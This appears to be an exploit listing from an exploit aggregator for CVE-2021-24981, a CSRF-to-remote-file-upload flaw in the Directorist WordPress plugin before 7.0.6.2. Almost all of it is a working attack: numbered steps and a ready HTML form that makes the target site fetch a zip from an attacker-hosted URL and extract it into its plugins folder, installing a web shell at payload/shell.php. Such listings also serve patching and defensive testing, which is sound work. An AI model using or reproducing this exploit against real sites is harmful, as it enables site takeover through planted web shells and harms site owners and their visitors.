Exploit for Directorist – Business Directory Plugin < 7.0.6.2 - CSRF to Remote File Upload CVE-2021-24981

## https://sploitus.com/exploit?id=WPEX-ID:4C45DF6D-B3F6-49E5-8B1F-EDD32A12D71C
1. Authenticate as any user.
2. Paste below HTML into any page on any site.
3. Replace [target-site] with the target URL.
4. Repalce [site-with-payload-zip] with the URL hosting your zip file and submit the form.
5. Zip file contents will be extracted in plugins folder https://[target-site].com/wp-content/plugins/payload/shell.php

<form action="https://[target-site].com/wp-admin/admin-ajax.php" method="post">
  <input type="text"  name="action" value="atbdp_download_file"><br>
    <input type="text"  name="download_item[download_link]" value='https://[site-with-payload-zip].com/payload.zip'><br>    
    <input type="text"  name="download_item[skip_licencing]" value='true'><br> 
    <input type="text"  name="download_item[permalink]" value='true'><br>    
    <input type="text"  name="type" value="plugin"><br>
  <input type="submit" value="Submit">
</form>